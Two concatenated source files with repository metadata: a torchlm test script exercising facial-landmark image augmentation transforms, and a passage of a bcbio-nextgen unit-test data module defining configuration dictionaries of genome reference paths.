2022-02-15T12:32:34.000Z
|
2022-03-31T14:12:06.000Z
|
test/transforms.py
|
DefTruth/pylandmarks
|
71d978a062e4a7c8fe90ca62c8dff109ea7718e7
|
[
"MIT"
] | 8
|
2022-02-15T09:17:51.000Z
|
2022-03-27T14:03:08.000Z
|
import cv2
import numpy as np
import torchvision
# import albumentations
from torch import Tensor
from typing import Tuple
import torchlm
def callable_array_noop(
img: np.ndarray,
landmarks: np.ndarray
) -> Tuple[np.ndarray, np.ndarray]:
# Do some transform here ...
return img.astype(np.uint32), landmarks.astype(np.float32)
def callable_tensor_noop(
img: Tensor,
landmarks: Tensor
) -> Tuple[Tensor, Tensor]:
# Do some transform here ...
return img, landmarks
def test_torchlm_transforms_pipeline():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
# use native torchlm transforms
torchlm.LandmarksRandomScale(prob=0.5),
torchlm.LandmarksRandomTranslate(prob=0.5),
torchlm.LandmarksRandomShear(prob=0.5),
torchlm.LandmarksRandomMask(prob=0.5),
torchlm.LandmarksRandomBlur(kernel_range=(5, 25), prob=0.5),
torchlm.LandmarksRandomBrightness(prob=0.),
torchlm.LandmarksRandomRotate(40, prob=0.5, bins=8),
torchlm.LandmarksRandomCenterCrop((0.5, 1.0), (0.5, 1.0), prob=0.5),
# bind torchvision image only transforms with a given bind prob
torchlm.bind(torchvision.transforms.GaussianBlur(kernel_size=(5, 25)), prob=0.5),
torchlm.bind(torchvision.transforms.RandomAutocontrast(p=0.5)),
torchlm.bind(torchvision.transforms.RandomAdjustSharpness(sharpness_factor=3, p=0.5)),
# # bind albumentations image only transforms
# torchlm.bind(albumentations.ColorJitter(p=0.5)),
# torchlm.bind(albumentations.GlassBlur(p=0.5)),
# torchlm.bind(albumentations.RandomShadow(p=0.5)),
# # bind albumentations dual transforms
# torchlm.bind(albumentations.RandomCrop(height=200, width=200, p=0.5)),
# torchlm.bind(albumentations.RandomScale(p=0.5)),
# torchlm.bind(albumentations.Rotate(p=0.5)),
# bind custom callable array functions with a given bind prob
torchlm.bind(callable_array_noop, bind_type=torchlm.BindEnum.Callable_Array, prob=0.5),
# bind custom callable Tensor functions
torchlm.bind(callable_tensor_noop, bind_type=torchlm.BindEnum.Callable_Tensor, prob=0.5),
torchlm.LandmarksResize((256, 256)),
torchlm.LandmarksNormalize(),
torchlm.LandmarksToTensor(),
torchlm.LandmarksToNumpy(),
torchlm.LandmarksUnNormalize()
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_mask():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
with_alpha = True
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_mask_alpha_{with_alpha}_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
if not with_alpha:
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomMask(prob=1.),
torchlm.LandmarksResize((256, 256))
])
else:
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomMaskMixUp(prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_patches_mixup():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
with_alpha = True
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_patches_mixup_alpha_{with_alpha}_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
if not with_alpha:
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomPatches(prob=1.),
torchlm.LandmarksResize((256, 256))
])
else:
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomPatchesMixUp(alpha=0.5, prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_backgrounds_mixup():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
with_alpha = True
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_backgrounds_mixup_alpha_{with_alpha}_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
if not with_alpha:
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomBackground(prob=1.),
torchlm.LandmarksResize((256, 256))
])
else:
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomBackgroundMixUp(alpha=0.5, prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_center_crop():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_center_crop_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomCenterCrop(width_range=(0.5, 0.1), height_range=(0.5, 0.1), prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_horizontal():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_horizontal_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomHorizontalFlip(prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_rotate():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_rotate_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomRotate(angle=80, prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_shear():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_shear_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomShear(prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_blur():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./2.jpg"
anno_path = "./2.txt"
save_path = f"./logs/2_wflw_blur_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksResize((256, 256)),
torchlm.LandmarksRandomBlur(kernel_range=(5, 35), prob=1.)
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_translate():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_translate_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomTranslate(prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_brightness():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_brightness_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomBrightness(prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_hsv():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_hsv_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomHSV(prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_scale():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_scale_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomScale(scale=(-0.5, 1.5), prob=1.),
torchlm.LandmarksResize((256, 256), keep_aspect=True)
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
def test_torchlm_transform_align():
print(f"torchlm version: {torchlm.__version__}")
seed = np.random.randint(0, 1000)
np.random.seed(seed)
img_path = "./assets/2.jpg"
anno_path = "./assets/2.txt"
save_path = f"./logs/2_wflw_align_{seed}.jpg"
img = cv2.imread(img_path)[:, :, ::-1].copy() # RGB
with open(anno_path, 'r') as fr:
lm_info = fr.readlines()[0].strip('\n').split(' ')
landmarks = [float(x) for x in lm_info[:196]]
landmarks = np.array(landmarks).reshape(98, 2) # (5,2) or (98, 2) for WFLW
org_img = torchlm.draw_landmarks(img, landmarks, circle=4)
cv2.imwrite("logs/2_wflw_orginal.jpg", org_img[:, :, ::-1])
# some global setting will show you useful details
torchlm.set_transforms_debug(True)
torchlm.set_transforms_logging(True)
torchlm.set_autodtype_logging(True)
transform = torchlm.LandmarksCompose([
torchlm.LandmarksRandomRotate(80, prob=1.),
torchlm.LandmarksRandomAlign(eyes_index=(96, 97), prob=1.),
torchlm.LandmarksResize((256, 256))
])
trans_img, trans_landmarks = transform(img, landmarks)
new_img = torchlm.draw_landmarks(trans_img, trans_landmarks, circle=2)
cv2.imwrite(save_path, new_img[:, :, ::-1])
# unset the global status when you are in training process
torchlm.set_transforms_debug(False)
torchlm.set_transforms_logging(False)
torchlm.set_autodtype_logging(False)
if __name__ == "__main__":
print(torchlm.albumentations_is_available())
test_torchlm_transforms_pipeline()
test_torchlm_transform_mask()
test_torchlm_transform_patches_mixup()
test_torchlm_transform_backgrounds_mixup()
test_torchlm_transform_center_crop()
test_torchlm_transform_horizontal()
test_torchlm_transform_rotate()
test_torchlm_transform_shear()
test_torchlm_transform_blur()
test_torchlm_transform_translate()
test_torchlm_transform_brightness()
test_torchlm_transform_hsv()
test_torchlm_transform_scale()
test_torchlm_transform_align()
| 34.752026
| 100
| 0.682725
| 2,843
| 21,442
| 4.931762
| 0.066479
| 0.05991
| 0.07988
| 0.049925
| 0.852935
| 0.827402
| 0.803937
| 0.797375
| 0.795806
| 0.795806
| 0
| 0.032434
| 0.18613
| 21,442
| 616
| 101
| 34.808442
| 0.771016
| 0.119345
| 0
| 0.765403
| 0
| 0
| 0.080143
| 0.043932
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037915
| false
| 0
| 0.014218
| 0.004739
| 0.056872
| 0.035545
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5034ae6f6a1d127e8a12fff5c192ed23781b96d
| 13,077
|
py
|
Python
|
tests/unit/data.py
|
a113n/bcbio-nextgen
|
1d4afef27ad2e84a4ecb6145ccc5058f2abb4616
|
[
"MIT"
] | 418
|
2015-01-01T18:21:17.000Z
|
2018-03-02T07:26:28.000Z
|
tests/unit/data.py
|
ahmedelhosseiny/bcbio-nextgen
|
b5618f3c100a1a5c04bd5c8acad8f96d0587e41c
|
[
"MIT"
] | 1,634
|
2015-01-04T11:43:43.000Z
|
2018-03-05T18:06:39.000Z
|
tests/unit/data.py
|
ahmedelhosseiny/bcbio-nextgen
|
b5618f3c100a1a5c04bd5c8acad8f96d0587e41c
|
[
"MIT"
] | 218
|
2015-01-26T05:58:18.000Z
|
2018-03-03T05:50:05.000Z
|
NAMES = {
'lane': 'Test1',
'lb': None,
'pu': 'Test1',
'sample': 'Test1',
'rg': 'Test1',
'pl': 'illumina'
}
DATA = {
'files': [
'/bcbio-nextgen/tests/test_automated_output/trimmed/1_1_Test1.trimmed.fq.gz',
'/bcbio-nextgen/tests/test_automated_output/trimmed/1_2_Test1.trimmed.fq.gz'
],
'dirs': {
'config': '/bcbio-nextgen/tests/test_automated_output',
'fastq': '/bcbio-nextgen/tests/data/test_fusion',
'work': '/bcbio-nextgen/tests/test_automated_output',
'flowcell': '/bcbio-nextgen/tests/data/test_fusion',
'galaxy': '/bcbio-nextgen/tests/data/automated'
},
'lane': '1',
'description': 'Test1',
'reference': {
'genome_context': [
'/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test.bed.gz',
'/bcbio-nextgen/tests/data/genomes/hg19/coverage/problem_regions/GA4GH/test2.bed.gz'
],
'fasta': {
'base': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa'
},
'star': {
'indexes': [
'/bcbio-nextgen/tests/data/genomes/hg19/star/chrLength.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/sjdbList.out.tab',
'/bcbio-nextgen/tests/data/genomes/hg19/star/SA',
'/bcbio-nextgen/tests/data/genomes/hg19/star/Genome',
'/bcbio-nextgen/tests/data/genomes/hg19/star/SAindex',
'/bcbio-nextgen/tests/data/genomes/hg19/star/chrStart.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/chrName.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/chrNameLength.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/genomeParameters.txt',
'/bcbio-nextgen/tests/data/genomes/hg19/star/Log.out'
]
},
'rtg': '/bcbio-nextgen/tests/data/genomes/hg19/rtg/hg19.sdf'
},
'sam_ref': '/bcbio-nextgen/tests/data/genomes/hg19/seq/hg19.fa',
'genome_resources': {
'rnaseq': {
'transcripts': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.gtf',
'transcripts_mask': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts-mask.gtf',
'gene_bed': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.bed'
},
'version': 7,
'variation': {
'train_omni': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_omni2.5.vcf.gz',
'dbnsfp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbNSFP_v2.5.gz',
'cosmic': '/bcbio-nextgen/tests/data/genomes/hg19/variation/cosmic-v68-hg19.vcf.gz',
'ancestral': '/bcbio-nextgen/tests/data/genomes/hg19/variation/human_ancestor.fa',
'train_hapmap': '/bcbio-nextgen/tests/data/genomes/hg19/variation/hapmap_3.3.vcf.gz',
'train_1000g': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_phase1.snps.high_confidence.vcf.gz',
'dbsnp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbsnp_132.vcf.gz',
'train_indels': '/bcbio-nextgen/tests/data/genomes/hg19/variation/Mills_Devine_2hit.indels.vcf.gz'
},
'srnaseq': {
'srna-trasncripts': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/srna-transcripts.gtf',
'mirbase': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/hairpin.fa'
},
'aliases': {
'snpeff': 'hg19',
'human': True,
'ensembl': 'homo_sapiens_vep_83_GRCh37'
}
},
'provenance': {
'data': '/bcbio-nextgen/tests/test_automated_output/provenance/data_versions.csv',
'entity': 'bcdd2c84-b800-11e6-a323-0242ac110002.prepare_sample.0.trim_sample.0.process_alignment.0',
'db': None,
'programs': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt'
},
'rgnames': {
'lane': 'Test1',
'lb': None,
'pu': 'Test1',
'sample': 'Test1',
'rg': 'Test1',
'pl': 'illumina'
},
'upload': {
'dir': '/bcbio-nextgen/tests/test_automated_output/upload',
'run_id': ''
},
'analysis': 'RNA-seq',
'name': ['', 'Test1'],
'genome_build': 'hg19',
'config': {
'galaxy_config': '/bcbio-nextgen/tests/data/automated/universe_wsgi.ini',
'resources': {
'gatk': {
'jvm_opts': ['-Xms500m', '-Xmx3500m']
},
'default': {
'cores': 16,
'jvm_opts': ['-Xms750m', '-Xmx3500m'],
'memory': '3G'
},
'express': {'memory': '8g'},
'seqcluster': {'memory': '8g'},
'program_versions': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt',
'dexseq': {'memory': '10g'},
'macs2': {'memory': '8g'},
'snpeff': {
'jvm_opts': ['-Xms750m', '-Xmx4g']
},
'qualimap': {'memory': '4g'}
},
'log_dir': '/var/log/bcbio',
'algorithm': {
'nomap_split_targets': 200,
'trim_reads': 'read_through',
'qc': ['fastqc', 'qualimap_rnaseq', 'samtools', 'gemini'],
'archive': [],
'recalibrate': False,
'mark_duplicates': True,
'nomap_split_size': 250,
'quality_format': 'illumina',
'aligner': 'star',
'validate_regions': None,
'realign': False,
'tools_off': [],
'fusion_mode': True,
'variant_regions': None,
'coverage_interval': None,
'adapters': ['truseq', 'polya'],
'validate': None, 'num_cores': 1, 'tools_on': []
},
'bcbio_system': '/bcbio-nextgen/tests/test_automated_output/bcbio_system-merged.yaml'
},
'resources': {},
'metadata': {
'batch': None,
'phenotype': ''
}
}
CONFIG = [[{'align_bam': '/bcbio-nextgen/tests/test_automated_output/align/Test1/Test1_star/Test1.bam',
'analysis': 'RNA-seq',
'config': {'algorithm': {'adapters': ['truseq', 'polya'],
'aligner': 'star',
'archive': [],
'coverage_interval': None,
'fusion_mode': True,
'mark_duplicates': True,
'nomap_split_size': 250,
'nomap_split_targets': 200,
'num_cores': 1,
'qc': ['fastqc',
'qualimap_rnaseq',
'samtools',
'gemini'],
'quality_format': 'illumina',
'realign': False,
'recalibrate': False,
'tools_off': [],
'tools_on': [],
'trim_reads': 'read_through',
'validate': None,
'validate_regions': None,
'variant_regions': None},
'bcbio_system': '/bcbio-nextgen/tests/test_automated_output/bcbio_system-merged.yaml',
'galaxy_config': '/bcbio-nextgen/tests/data/automated/universe_wsgi.ini',
'log_dir': '/var/log/bcbio',
'resources': {'default': {'cores': 16,
'jvm_opts': ['-Xms750m',
'-Xmx3500m'],
'memory': '3G'},
'dexseq': {'memory': '10g'},
'express': {'memory': '8g'},
'gatk': {'jvm_opts': ['-Xms500m',
'-Xmx3500m']},
'macs2': {'memory': '8g'},
'program_versions': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt',
'qualimap': {'memory': '4g'},
'seqcluster': {'memory': '8g'},
'snpeff': {'jvm_opts': ['-Xms750m', '-Xmx4g']}}},
'description': 'Test1',
'dirs': {'config': '/bcbio-nextgen/tests/test_automated_output',
'fastq': '/bcbio-nextgen/tests/data/test_fusion',
'flowcell': '/bcbio-nextgen/tests/data/test_fusion',
'galaxy': '/bcbio-nextgen/tests/data/automated',
'work': '/bcbio-nextgen/tests/test_automated_output'},
'files': ['/bcbio-nextgen/tests/test_automated_output/trimmed/1_1_Test1.trimmed.fq.gz',
'/bcbio-nextgen/tests/test_automated_output/trimmed/1_2_Test1.trimmed.fq.gz'],
'genome_build': 'hg19',
'genome_resources': {'aliases': {'ensembl': 'homo_sapiens_vep_83_GRCh37',
'human': True,
'snpeff': 'hg19'},
'rnaseq': {'gene_bed': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.bed',
'transcripts': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts.gtf',
'transcripts_mask': '/bcbio-nextgen/tests/data/genomes/hg19/rnaseq/ref-transcripts-mask.gtf'},
'srnaseq': {'mirbase': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/hairpin.fa',
'srna-trasncripts': '/bcbio-nextgen/tests/data/genomes/hg19/srnaseq/srna-transcripts.gtf'},
'variation': {'ancestral': '/bcbio-nextgen/tests/data/genomes/hg19/variation/human_ancestor.fa',
'cosmic': '/bcbio-nextgen/tests/data/genomes/hg19/variation/cosmic-v68-hg19.vcf.gz',
'dbnsfp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbNSFP_v2.5.gz',
'dbsnp': '/bcbio-nextgen/tests/data/genomes/hg19/variation/dbsnp_132.vcf.gz',
'train_1000g': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_phase1.snps.high_confidence.vcf.gz',
'train_hapmap': '/bcbio-nextgen/tests/data/genomes/hg19/variation/hapmap_3.3.vcf.gz',
'train_indels': '/bcbio-nextgen/tests/data/genomes/hg19/variation/Mills_Devine_2hit.indels.vcf.gz',
'train_omni': '/bcbio-nextgen/tests/data/genomes/hg19/variation/1000G_omni2.5.vcf.gz'},
'version': 7},
'hla': {'fastq': None},
'lane': '1',
'metadata': {'batch': None, 'phenotype': ''},
'name': ['', 'Test1'],
'provenance': {'data': '/bcbio-nextgen/tests/test_automated_output/provenance/data_versions.csv',
'db': None,
'entity': '21efc524-bc79-11e6-a323-0242ac110002.prepare_sample.0.trim_sample.0.process_alignment.0',
'programs': '/bcbio-nextgen/tests/test_automated_output/provenance/programs.txt'},
